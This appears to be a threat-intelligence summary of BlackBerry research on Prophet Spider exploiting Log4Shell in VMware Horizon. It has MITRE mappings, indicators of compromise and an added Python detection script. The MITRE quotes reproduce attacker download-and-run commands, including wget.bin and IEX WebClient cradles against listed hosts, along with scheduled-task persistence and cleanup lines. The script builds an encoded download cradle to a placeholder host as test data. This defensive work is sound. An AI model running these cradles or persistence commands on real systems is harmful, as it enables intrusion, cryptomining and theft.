BlackBerry researchers link the Prophet Spider Initial Access Broker (IAB) group to exploiting the Log4j (Log4Shell) vulnerabilities in VMware Horizon to break into organizations. The article outlines IoCs, observed post-exploitation payloads (cryptomining, Cobalt Strike beacons, webshells), and recommended mitigations to help defenders detect and respond. #ProphetSpider #Log4Shell #VMwareHorizon #PowerShell #CobaltStrike #VMBlastSG #wget.bin
Keypoints
- Prophet Spider operated as an IAB during the Log4Shell window, exploiting the Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, and CVE-2021-44832 in VMware Horizon.
- Exploitation was detectable by monitoring ws_TomcatService.exe (the Horizon Tomcat service) for child processes: successful exploitation spawned cmd.exe or powershell.exe under it.
- Post-exploitation activity commonly used encoded PowerShell commands to download a second-stage payload, enabling cryptomining, ransomware, or extortion.
- Threat actors used PowerShell download methods (System.Net.WebClient) and also curl/WSL bash to fetch payloads, sometimes via IEX-based techniques.
- Cryptocurrency miners were frequently deployed; Cobalt Strike beacons were also observed, sometimes launched via rundll32.exe.
- Persistence and backdoors included Scheduled Tasks and webshells (absg-worker.js) injected into VMBlastSG services, with cleanup actions to hide traces.
- Traits common to Prophet Spider intrusions included a specific temp folder (C:\Windows\Temp\7fde), use of wget.bin, and download IPs/domains associated with known actors.
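Detection logic for the process chain the keypoints describe, written as an added example (not code from the BlackBerry post): it scans constructed process-creation records for ws_TomcatService.exe spawning cmd.exe or powershell.exe, decodes a PowerShell -Enc argument to look for a System.Net.WebClient/IEX download cradle, and flags the one-minute schtasks persistence pattern. The event records, file paths and the 198.51.100.7 download host are constructed placeholders.

```python
import base64
import re

SUSPICIOUS_PARENT = "ws_tomcatservice.exe"      # Horizon Tomcat service named in the report
SHELLS = {"cmd.exe", "powershell.exe"}
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"system\.net\.webclient|download(?:string|data|file)|\biex\b|invoke-expression", re.I)
TASK_RE = re.compile(r"schtasks(?:\.exe)?\s+/create\b.*/sc\s+minute\s+/mo\s+1\b", re.I)

def ps_encode(cmd):
    """Build a PowerShell -Enc argument: base64 over UTF-16LE text (used to build the sample)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")

# Constructed sample records: (parent image, image, command line). Paths and host are made up.
CRADLE = 'IEX ((New-Object System.Net.WebClient).DownloadString("http://198.51.100.7:8080/drv"))'
SAMPLE_EVENTS = [
    ("C:\\Horizon\\bin\\ws_TomcatService.exe", "C:\\Windows\\System32\\cmd.exe",
     'cmd /C "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc ' + ps_encode(CRADLE) + '"'),
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\schtasks.exe",
     "schtasks.exe /create /F /sc minute /mo 1 /tn BrowserUpdate /tr powershell.exe"),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -Enc payload found in a command line, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(parent, image, cmdline):
    """Return the detection names that fire for one process-creation record."""
    findings = []
    if basename(parent) == SUSPICIOUS_PARENT and basename(image) in SHELLS:
        findings.append("horizon_child_shell")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None and CRADLE_RE.search(decoded):
        findings.append("encoded_download_cradle")   # cradle hidden behind -Enc
    elif CRADLE_RE.search(cmdline):
        findings.append("download_cradle")           # cradle in clear text
    if TASK_RE.search(cmdline):
        findings.append("minute_scheduled_task")
    return findings

def scan(events):
    return [classify(*event) for event in events]
```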
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of the Log4j vulnerabilities in VMware Horizon to gain initial access. – [“The BlackBerry Research & Intelligence and Incident Response teams have found evidence correlating attacks by Prophet Spider with exploitation of the Log4j vulnerability in VMware Horizon.”]
- [T1059.001] Command and Scripting Interpreter: PowerShell – Encoded PowerShell commands used to download the second-stage payload. – [“encoded PowerShell commands to download a second-stage payload.”]
- [T1105] Ingress Tool Transfer – Downloaded payloads via WebClient/DownloadString or curl-based downloads. – [“PowerShell’s System.Net.WebClient… DownloadString, DownloadData, or DownloadFile methods.”]
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Use of cmd.exe to launch PowerShell and other commands. – [“cmd /C ‘powershell -NonI -W Hidden -NoP -Exec Bypass -Enc ‘”]
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Use of WSL bash to execute downloaded content. – [“the attacker then attempted to execute the downloaded content using the Windows Subsystem for Linux (WSL) bash utility.”]
- [T1496] Resource Hijacking – Deployment of cryptocurrency mining software on infected hosts. – [“BlackBerry researchers observed the threat actors installing cryptocurrency mining software on the affected systems.”]
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – Beacon payload spawned via rundll32.exe. – [“beacon payload would spawn either a 32- or 64-bit version of rundll32.exe containing the beacon payload.”]
- [T1505.003] Web Shell – Webshell injected into absg-worker.js and VMBlastSG service manipulation to enable attacker access. – [“webshell file was injected into absg-worker.js…”]
- [T1082] System Information Discovery – Enumerating basic network and domain information. – [“the attacker began their attempts to enumerate basic information about the network and domain.”]
- [T1552.001] Credentials in Registry – Credential harvesting from the registry. – [“harvest credentials from the registry.”]
- [T1105] Ingress Tool Transfer – Additional payloads (ve.bin, winntaa.exe) fetched with wget.bin. – [“wget.bin -t 1 hxxp://149.28.200[.]140:443/ve.bin … winntaa.exe”]
- [T1105] Ingress Tool Transfer – Multiple downloads from remote hosts (wget.bin, xms.ps1, drv, etc.). – [“wget.bin -t 1 hxxp://149.28.200[.]140:443/wget.bin”; “IEX ((New-Object System.Net.WebClient).DownloadString(‘hxxp://185.112.83[.]116:8080/drv’))”]
- [T1053.005] Scheduled Task – Creation of a scheduled task for persistence/C2 and configuration storage. – [“C:\Windows\system32\schtasks.exe /create /F /sc minute /mo 1 /tn BrowserUpdate /tr …”]
- [T1070.004] File Deletion / Clear Windows Artifacts (Defense Evasion) – Cleanup actions that delete dropped files and remove scheduled tasks to hide traces. – [“del /f /q C:\ProgramData…”, ”schtasks /delete /tn * /F”]
Indicators of Compromise
- [File Path] – c:\windows\system32\config\systemprofile\mimu\nssm.exe, c:\windows\system32\config\systemprofile\mimu2\nssm.exe, c:\windows\system32\config\systemprofile\mimu\xmrig.exe
- [File Path] – c:\windows\temp\winntaa.exe, c:\windows\temp\wget.bin, C:\Windows\system32\config\systemprofile\AppData\Roaming\network02.exe
- [URL] – hxxp://149.28.200[.]140:443/wget.bin, hxxp://149.28.200[.]140:443/winntaa.exe
- [URL] – hxxp://80.71.158[.]96/xms.ps1, hxxp://185.112.83[.]116:8080/drv, hxxp://api.rogerscorp[.]org:80
- [IP/Port] – 149.28.200[.]140:443, 185.112.83[.]116:8080, 198.23.214[.]117:8080
- [Domain] – b.oracleservice[.]top, api.rogerscorp[.]org
- [File] – xms.ps1, wget.bin, absg-worker.js, dd.ps1, 2.ps1
- [IP] – 138.68.246[.]18, 140.246.171[.]141, 167.114.114[.]169
Read more: https://blogs.blackberry.com/en/2022/01/log4u-shell4me